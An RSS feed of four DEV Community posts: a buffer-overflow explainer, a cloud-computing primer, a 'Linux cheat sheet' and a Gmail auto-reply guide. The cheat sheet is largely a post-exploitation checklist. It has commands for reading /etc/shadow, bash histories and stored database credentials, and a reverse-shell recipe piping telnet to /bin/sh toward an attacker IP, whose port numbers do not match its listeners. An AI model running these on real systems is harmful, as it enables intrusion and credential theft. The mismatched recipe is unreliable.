<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: For Community</title>
    <description>The latest articles on DEV Community by For Community (@forcommunity).</description>
    <link>https://dev.to/forcommunity</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F3473%2Fc065e4a7-fa42-4cce-911a-73cb6af2d941.png</url>
      <title>DEV Community: For Community</title>
      <link>https://dev.to/forcommunity</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/forcommunity"/>
    <language>en</language>
    <item>
      <title>What is Buffer flow ?</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Mon, 22 Mar 2021 11:54:05 +0000</pubDate>
      <link>https://dev.to/forcommunity/what-is-buffer-flow-38ia</link>
      <guid>https://dev.to/forcommunity/what-is-buffer-flow-38ia</guid>
      <description>&lt;p&gt;&lt;strong&gt;What is Buffer Overflow&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Buffers are memory storage regions that temporarily hold data while it is being transferred from one location to another. A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the storage capacity of the memory buffer. As a result, the program attempting to write the data to the buffer overwrites adjacent memory locations.&lt;/p&gt;

&lt;p&gt;For example, a buffer for log-in credentials may be designed to expect username and password inputs of 8 bytes, so if a transaction involves an input of 10 bytes (that is, 2 bytes more than expected), the program may write the excess data past the buffer boundary.&lt;/p&gt;

&lt;p&gt;Buffer overflows can affect all types of software. They typically result from malformed inputs or failure to allocate enough space for the buffer. If the transaction overwrites executable code, it can cause the program to behave unpredictably and generate incorrect results, memory access errors, or crashes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is a Buffer Overflow Attack&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Attackers exploit buffer overflow issues by overwriting the memory of an application. This changes the execution path of the program, triggering a response that damages files or exposes private information. For example, an attacker may introduce extra code, sending new instructions to the application to gain access to IT systems.&lt;/p&gt;

&lt;p&gt;If attackers know the memory layout of a program, they can intentionally feed input that the buffer cannot store, and overwrite areas that hold executable code, replacing it with their own code. For example, an attacker can overwrite a pointer (an object that points to another area in memory) and point it to an exploit payload, to gain control over the program.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Types of Buffer Overflow Attacks&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Stack-based buffer overflows are more common, and leverage stack memory that only exists during the execution time of a function.&lt;/p&gt;

&lt;p&gt;Heap-based attacks are harder to carry out and involve flooding the memory space allocated for a program beyond memory used for current runtime operations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Programming Languages are More Vulnerable?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;C and C++ are two languages that are highly susceptible to buffer overflow attacks, as they don’t have built-in safeguards against overwriting or accessing data in their memory. Mac OSX, Windows, and Linux all use code written in C and C++.&lt;/p&gt;

&lt;p&gt;Languages such as PERL, Java, JavaScript, and C# use built-in safety mechanisms that minimize the likelihood of buffer overflow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to Prevent Buffer Overflows&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Developers can protect against buffer overflow vulnerabilities via security measures in their code, or by using languages that offer built-in protection.&lt;/p&gt;

&lt;p&gt;In addition, modern operating systems have runtime protection. Three common protections are:&lt;/p&gt;

&lt;p&gt;Address space randomization (ASLR)—randomly moves around the address space locations of data regions. Typically, buffer overflow attacks need to know the locality of executable code, and randomizing address spaces makes this virtually impossible.&lt;/p&gt;

&lt;p&gt;Data execution prevention—flags certain areas of memory as non-executable or executable, which stops an attack from running code in a non-executable region.&lt;/p&gt;

&lt;p&gt;Structured exception handler overwrite protection (SEHOP)—helps stop malicious code from attacking Structured Exception Handling (SEH), a built-in system for managing hardware and software exceptions. It thus prevents an attacker from being able to make use of the SEH overwrite exploitation technique. At a functional level, an SEH overwrite is achieved using a stack-based buffer overflow to overwrite an exception registration record, stored on a thread’s stack.&lt;/p&gt;

&lt;p&gt;Security measures in code and operating system protection are not enough. When an organization discovers a buffer overflow vulnerability, it must react quickly to patch the affected software and make sure that users of the software can access the patch. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube.Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a&lt;br&gt;
part of us *&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Telegram&lt;/strong&gt;  = &lt;a href="https://t.me/infosecbugbounty" rel="noopener noreferrer"&gt;https://t.me/infosecbugbounty&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
CyberSecurity &lt;br&gt;
&lt;a href="https://t.me/infosecbugbounty" rel="noopener noreferrer"&gt;https://t.me/infosecbugbounty&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ" rel="noopener noreferrer"&gt;https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devjournal</category>
      <category>devops</category>
      <category>programming</category>
      <category>prod</category>
    </item>
    <item>
      <title>What is Cloud Computing?</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Fri, 12 Mar 2021 20:55:39 +0000</pubDate>
      <link>https://dev.to/forcommunity/what-is-cloud-computing-3f22</link>
      <guid>https://dev.to/forcommunity/what-is-cloud-computing-3f22</guid>
      <description>&lt;p&gt;Cloud computing is the on-demand availability of computer system resources, especially data storage (cloud storage) and computing power, without direct active management by the user. The term is generally used to describe data centres available to many users over the Internet.Large clouds, predominant today, often have functions distributed over multiple locations from central servers. If the connection to the user is relatively close, it may be designated an edge server.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzrhmo84eg53qkxx6d25e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzrhmo84eg53qkxx6d25e.png" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Cloud computing metaphor: the group of networked elements providing services need not be individually addressed or managed by users; instead, the entire provider-managed suite of hardware and software can be thought of as an amorphous cloud.&lt;/p&gt;

&lt;p&gt;Clouds may be limited to a single organisation (enterprise clouds, or be available to many organisations (public cloud).&lt;br&gt;
Advocates of public and hybrid clouds note that cloud computing allows companies to avoid or minimise up-front IT infrastructure costs. Proponents also claim that cloud computing allows enterprises to get their applications up and running faster, with improved manageability and less maintenance, and that it enables IT teams to more rapidly adjust resources to meet fluctuating and unpredictable demand,[3][4][5] providing the burst computing capability: high computing power at certain periods of peak demand.&lt;br&gt;
Cloud providers typically use a "pay-as-you-go" model, which can lead to unexpected operating expenses if administrators are not familiarised with cloud-pricing models.&lt;/p&gt;

&lt;p&gt;The availability of high-capacity networks, low-cost computers and storage devices as well as the widespread adoption of hardware virtualisation, service-oriented architecture and autonomic and utility computing has led to growth in cloud computing.By 2019, Linux was the most widely used operating system, including in Microsoft's offerings and is thus described as dominant.The Cloud Service Provider (CSP) will screen, keep up and gather data about the firewalls, intrusion identification or/and counteractive action frameworks and information stream inside the network.&lt;/p&gt;

&lt;p&gt;Cloud computing services fall into 3 main categories: Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS). Functions as a Service (FaaS) is a relatively new Cloud service model. These are sometimes called the Cloud computing stack because they build on top of one another.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Infrastructure-as-a-service (IaaS)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Infrastructure as a Service (IaaS) contains the most basic building blocks for Cloud infrastructure and offers services on tops of it such as renting IT infrastructure (virtual or physical) and networking features. IaaS mainly includes Cloud-based services on a pay-as-you-go model. A user pays for computing services on IaaS because it is the fundamental platform to build new technologies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Platform as a service (PaaS)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Platform-as-a-service (PaaS) refers to the supply of on-demand tools for developing, testing, delivering, and managing software applications. PaaS delivers a framework for developers and IT architects to create web or mobile apps that are scalable, without worrying about setting up or managing the underlying infrastructure of servers, storage, network, and databases needed for development.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Software as a service (SaaS)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Software-as-a-service (SaaS) is a method for delivering on-demand software applications through Cloud on a subscription basis. A CSP takes care of managing the Cloud infrastructure and offers SaaS applications over the internet to a user that are accessible through a web browser. These applications are also available on multiple devices which can be accessed from anywhere.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Functions as a Service (FaaS)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Functions as a Service (FaaS) adds another layer of abstraction to PaaS so that developers are completely isolated from everything in the stack below their code. FaaS is the concept of Serverless Computing. Instead of handling the hassles of virtual servers, containers, and application runtimes, they upload narrowly functional blocks of code and set them to be triggered by a certain event. FaaS applications consume no IaaS resources until an event occurs, reducing pay-per-use fees.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube.Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ" rel="noopener noreferrer"&gt;https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>devjournal</category>
      <category>programming</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Ultimate Linux Cheat Sheet</title>
      <dc:creator>Justin Varghese</dc:creator>
      <pubDate>Tue, 02 Mar 2021 20:03:22 +0000</pubDate>
      <link>https://dev.to/forcommunity/ultimate-linux-cheat-sheet-4gm5</link>
      <guid>https://dev.to/forcommunity/ultimate-linux-cheat-sheet-4gm5</guid>
      <description>&lt;p&gt;*&lt;em&gt;Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a&lt;br&gt;
part of us *&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Telegram&lt;/strong&gt;  = &lt;a href="https://t.me/infosecbugbounty" rel="noopener noreferrer"&gt;https://t.me/infosecbugbounty&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Linux commands may seem intimidating at first glance if you are not used to using the terminal. There are many commands for performing operations and processes on your Linux system.&lt;/p&gt;

&lt;p&gt;No matter whether you are new to Linux or an experienced user, having a list of common commands close at hand is helpful.&lt;/p&gt;

&lt;p&gt;In this tutorial, you will find commonly used Linux commands as well list of common Linux commands&lt;br&gt;
Important: Depending on your system setup, some of the commands below may require invoking sudo to be executed&lt;/p&gt;

&lt;p&gt;A list of all Linux commands commonly used with Linux operating systems.&lt;br&gt;
Linux Commands List&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;File Commands&lt;/strong&gt;&lt;br&gt;
List files in the directory:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ls&lt;/strong&gt;&lt;br&gt;
List all files (shows hidden files):&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ls -a&lt;/strong&gt;&lt;br&gt;
Show directory you are currently working in:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;pwd&lt;/strong&gt;&lt;br&gt;
Create a new directory:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;mkdir [directory]&lt;/strong&gt;&lt;br&gt;
Make a new directory&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;rm [file_name] *&lt;/em&gt;&lt;br&gt;
Remove a directory recursively&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;rm -rf [directory_name]&lt;/strong&gt;&lt;br&gt;
It deletes the directory&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;cp [file_name1] [file_name2]&lt;/strong&gt;&lt;br&gt;
Recursively copy the contents of one file to a second file:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;cp -r [directory_name1] [directory_name2]&lt;/strong&gt;&lt;br&gt;
Rename [file_name1] to [file_name2] with the command:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;mv [file_name1] [file_name2]&lt;/strong&gt;&lt;br&gt;
Create a symbolic link to a file:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ln -s /path/to/[file_name] [link_name]&lt;/strong&gt;&lt;br&gt;
Create a new file:&lt;/p&gt;

&lt;p&gt;touch [file_name]&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hardware Information&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Show bootup messages:&lt;/p&gt;

&lt;p&gt;dmesg&lt;br&gt;
See CPU information:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;cat /proc/cpuinfo&lt;/strong&gt;&lt;br&gt;
Display free and used memory with:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;free -h&lt;/strong&gt;&lt;br&gt;
List hardware configuration information:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;lshw&lt;/strong&gt;&lt;br&gt;
See information about block devices:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;lsblk&lt;/strong&gt;&lt;br&gt;
Show PCI devices in a tree-like diagram:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;lspci -tv&lt;/strong&gt;&lt;br&gt;
Display USB devices in a tree-like diagram:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;lsusb -tv&lt;/strong&gt;&lt;br&gt;
Show hardware information from the BIOS:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;dmidecode&lt;/strong&gt;&lt;br&gt;
Display disk data information:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;hdparm -i /dev/disk&lt;/strong&gt;&lt;br&gt;
Conduct a read-speed test on device/disk:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;hdparm -tT /dev/[device]&lt;/strong&gt;&lt;br&gt;
Test for unreadable blocks on device/disk:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;badblocks -s /dev/[device]&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Operating System&lt;br&gt;
What's the distribution type? What version?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat /etc/issue&lt;br&gt;
cat /etc/*-release&lt;br&gt;
cat /etc/lsb-release&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's the kernel version? Is it 64-bit?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat /proc/version&lt;br&gt;
uname -a&lt;br&gt;
uname -mrs&lt;br&gt;
rpm -q kernel&lt;br&gt;
dmesg | grep Linux&lt;br&gt;
ls /boot | grep vmlinuz-&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What can be learnt from the environmental variables?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat /etc/profile&lt;br&gt;
cat /etc/bashrc&lt;br&gt;
cat ~/.bash_profile&lt;br&gt;
cat ~/.bashrc&lt;br&gt;
cat ~/.bash_logout&lt;br&gt;
env&lt;br&gt;
set&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is there a printer?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;lpstat -a&lt;/p&gt;

&lt;p&gt;Applications &amp;amp; Services&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What services are running? Which service has which user privilege?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;ps aux&lt;br&gt;
ps -ef&lt;br&gt;
top&lt;br&gt;
cat /etc/services&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Which service(s) are been running by root? Of these services, which are vulnerable&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;ps aux | grep root&lt;br&gt;
ps -ef | grep root&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What applications are installed? What version are they? Are they currently running?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;ls -alh /usr/bin/&lt;br&gt;
ls -alh /sbin/&lt;br&gt;
dpkg -l&lt;br&gt;
rpm -qa&lt;br&gt;
ls -alh /var/cache/apt/archivesO&lt;br&gt;
ls -alh /var/cache/yum/&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat /etc/syslog.conf&lt;br&gt;
cat /etc/chttp.conf&lt;br&gt;
cat /etc/lighttpd.conf&lt;br&gt;
cat /etc/cups/cupsd.conf&lt;br&gt;
cat /etc/inetd.conf&lt;br&gt;
cat /etc/apache2/apache2.conf&lt;br&gt;
cat /etc/my.conf&lt;br&gt;
cat /etc/httpd/conf/httpd.conf&lt;br&gt;
cat /opt/lampp/etc/httpd.conf&lt;br&gt;
ls -aRl /etc/ | awk '$1 ~ /^.&lt;em&gt;r.&lt;/em&gt;/&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What jobs are scheduled?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;crontab -l&lt;br&gt;
ls -alh /var/spool/cron&lt;br&gt;
ls -al /etc/ | grep cron&lt;br&gt;
ls -al /etc/cron*&lt;br&gt;
cat /etc/cron*&lt;br&gt;
cat /etc/at.allow&lt;br&gt;
cat /etc/at.deny&lt;br&gt;
cat /etc/cron.allow&lt;br&gt;
cat /etc/cron.deny&lt;br&gt;
cat /etc/crontab&lt;br&gt;
cat /etc/anacrontab&lt;br&gt;
cat /var/spool/cron/crontabs/root&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Any plain text usernames and/or passwords?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;grep -i user [filename]&lt;br&gt;
grep -i pass [filename]&lt;br&gt;
grep -C 5 "password" [filename]&lt;br&gt;
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Communications &amp;amp; Networking&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;What NIC(s) does the system have? Is it connected to another network?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;/sbin/ifconfig -a&lt;br&gt;
cat /etc/network/interfaces&lt;br&gt;
cat /etc/sysconfig/network&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat /etc/resolv.conf&lt;br&gt;
cat /etc/sysconfig/network&lt;br&gt;
cat /etc/networks&lt;br&gt;
iptables -L&lt;br&gt;
hostname&lt;br&gt;
dnsdomainname&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What other users &amp;amp; hosts are communicating with the system?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;lsof -i&lt;br&gt;
lsof -i :80&lt;br&gt;
grep 80 /etc/services&lt;br&gt;
netstat -antup&lt;br&gt;
netstat -antpx&lt;br&gt;
netstat -tulpn&lt;br&gt;
chkconfig --list&lt;br&gt;
chkconfig --list | grep 3:on&lt;br&gt;
last&lt;br&gt;
w&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Whats cached? IP and/or MAC addresses&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;arp -e&lt;br&gt;
route&lt;br&gt;
/sbin/route -nee&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is packet sniffing possible? What can be seen? Listen to live traffic&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21&lt;/p&gt;

&lt;p&gt;Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]&lt;/p&gt;

&lt;p&gt;Have you got a shell? Can you interact with the system?&lt;/p&gt;

&lt;p&gt;nc -lvp 4444    # Attacker. Input (Commands)&lt;br&gt;
nc -lvp 4445    # Attacker. Ouput (Results)&lt;br&gt;
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Confidential Information &amp;amp; Users&lt;/strong&gt;&lt;br&gt;
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?**&lt;/p&gt;

&lt;p&gt;id&lt;br&gt;
who&lt;br&gt;
w&lt;br&gt;
last&lt;br&gt;
cat /etc/passwd | cut -d: -f1    # List of users&lt;br&gt;
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users&lt;br&gt;
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users&lt;br&gt;
cat /etc/sudoers&lt;br&gt;
sudo -l&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What sensitive files can be found?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat /etc/passwd&lt;br&gt;
cat /etc/group&lt;br&gt;
cat /etc/shadow&lt;br&gt;
ls -alh /var/mail/&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Anything "interesting" in the home directorie(s)? If it's possible to access&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;ls -ahlR /root/&lt;br&gt;
ls -ahlR /home/&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat /var/apache2/config.inc&lt;br&gt;
cat /var/lib/mysql/mysql/user.MYD&lt;br&gt;
cat /root/anaconda-ks.cfg&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What has the user being doing? Is there any password in plain text? What have they been editing?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat ~/.bash_history&lt;br&gt;
cat ~/.nano_history&lt;br&gt;
cat ~/.atftp_history&lt;br&gt;
cat ~/.mysql_history&lt;br&gt;
cat ~/.php_history&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What user information can be found?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;cat ~/.bashrc&lt;br&gt;
cat ~/.profile&lt;br&gt;
cat /var/mail/root&lt;br&gt;
cat /var/spool/mail/root&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube at 10 Am (IST) on 16 January 2020 .Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

</description>
      <category>programming</category>
      <category>productivity</category>
      <category>linux</category>
      <category>devops</category>
    </item>
    <item>
      <title>How to Make Automatically Reply to Emails in Gmail</title>
      <dc:creator>Justin Varghese</dc:creator>
      <pubDate>Sun, 28 Feb 2021 14:08:23 +0000</pubDate>
      <link>https://dev.to/forcommunity/how-to-make-automatically-reply-to-emails-in-gmail-4dp5</link>
      <guid>https://dev.to/forcommunity/how-to-make-automatically-reply-to-emails-in-gmail-4dp5</guid>
      <description>&lt;p&gt;Today almost everyone is using email services in daily life. And that is why we are here with How To Reply Common Emails Automatically In Gmail.&lt;/p&gt;

&lt;p&gt;In this article we will discuss about automated emails that you can send automatically through your account.&lt;/p&gt;

&lt;p&gt;As sometime you are on a position in which you have to reply an email with same text every time.&lt;/p&gt;

&lt;p&gt;So in this method you will be setting a fix message for some certain queries and Gmail will work for you and will send the reply back as set by you earlier.&lt;/p&gt;

&lt;p&gt;So have a look in this cool method that can reduce your boring work of sending same mails to common queries.&lt;/p&gt;

&lt;p&gt;Steps To Make Your Gmail Automatic Replier To Common Emails You Receive :-&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;First of all login into your gmail account where you want to set up Gmail Automatic Reply.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Now click on the down arrow button near the Gmail search box there.&lt;/li&gt;
&lt;li&gt;Now there you will see a form that instantly appears when you click on that arrow button.1&lt;/li&gt;
&lt;li&gt;Now fill up the form completely and in the field Have the word and Does not Have the word there you can set the words that you commonly received in you emails and you want to set them accordingly.&lt;/li&gt;
&lt;li&gt;Now after completely filling the form click on Create filter with this search at the bottom right corner of the form.&lt;/li&gt;
&lt;li&gt;Now on next box you will see option there mark on Send canned response and there you will specify the canned reply from previous conversations.&lt;/li&gt;
&lt;li&gt;After completing these all just click on Create Filter there and the filter will get created.&lt;/li&gt;
&lt;li&gt;That's it you are done. Now gmail will send automatic response to the mails received with the matched details.&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;/ol&gt;

